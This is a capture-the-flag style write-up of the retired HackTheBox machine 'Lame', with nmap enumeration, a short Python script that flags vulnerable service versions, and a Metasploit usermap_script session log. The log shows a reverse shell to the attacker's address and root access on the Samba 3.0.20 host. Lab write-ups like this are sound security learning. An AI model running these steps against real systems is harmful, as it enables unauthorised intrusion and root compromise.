5 July 2022

Pentesting Fun Stuff

following the cyber security path…

HTB: Lame

Introduction

This is a machine from hackthebox.eu. According to the HTB policy I can publish this write-up seeing the machine is ‘retired’.

Enumeration

Starting with a portscan.

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 08:54 CEST
Nmap scan report for 10.10.10.3
Host is up (0.025s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-29T02:55:45-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   27.12 ms 10.10.14.1
2   24.79 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.03 seconds

At first sight I would think that my entry point is the FTP service running on port 21. This particular version (vsftpd 2.3.4) has an intentional backdoor that is easily reachable from the outside. Oddly enough, after several tries this known backdoor isn't responding. Time to check on the next possible vulnerability.
After checking exploit-db it seems this Samba version (3.0.20) is vulnerable; Metasploit's usermap_script module targets it.
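As an added example (not part of the original write-up), here is a small Python triage script that parses nmap's service table, with the scan above embedded as a constructed sample, and flags the two versions the post singles out. The watch-list dictionary and the function names are my own assumptions, not anything nmap or HTB provides.

```python
import re

# Constructed sample: the service table from the nmap scan above, as nmap prints it.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# Hypothetical watch-list (assumption): product name as nmap prints it ->
# (regex matched against the version token, reason). These are the two
# versions the write-up identifies as the way in; a real list would be longer.
WATCHLIST = {
    "vsftpd": (r"^2\.3\.4$", "vsftpd 2.3.4: release known to contain a backdoor"),
    "Samba smbd": (r"^3\.0\.20", "Samba 3.0.20: 'username map script' command execution"),
}

# PORT/PROTO  STATE  SERVICE  VERSION (VERSION may be empty)
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(text):
    """Return one dict per port line in nmap's normal output; header/script lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": name, "version": version.strip()})
    return services


def flag_services(services, watchlist=WATCHLIST):
    """Return (port, product, version, reason) for every open service on the watch-list."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        for product, (pattern, reason) in watchlist.items():
            prefix = product + " "
            if not svc["version"].startswith(prefix):
                continue
            version = svc["version"][len(prefix):].split()[0]  # first token after the product
            if re.match(pattern, version):
                findings.append((svc["port"], product, version, reason))
    return findings


if __name__ == "__main__":
    for port, product, version, reason in flag_services(parse_services(NMAP_OUTPUT)):
        print(f"{port}: {product} {version} -> {reason}")
```

The 139/tcp line is deliberately not flagged: its version token is the fingerprint range "3.X", not a concrete release, so a version match there would be a guess rather than a finding.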

msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job 3.
[*] Started reverse TCP double handler on 10.10.14.3:4444
msf exploit(usermap_script) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i2UsybyxuoY1LtnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i2UsybyxuoY1LtnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:45093) at 2017-09-29 09:12:49 +0200
msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)
cd /root
ls -lah
total 80K
drwxr-xr-x 13 root root 4.0K Sep 28 23:47 .
drwxr-xr-x 21 root root 4.0K May 20  2012 ..
-rw-------  1 root root  373 Sep 28 23:47 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K Sep 28 23:47 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K Sep 28 23:47 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Sep 28 23:47 vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df

And there is the hash needed to prove I own this box.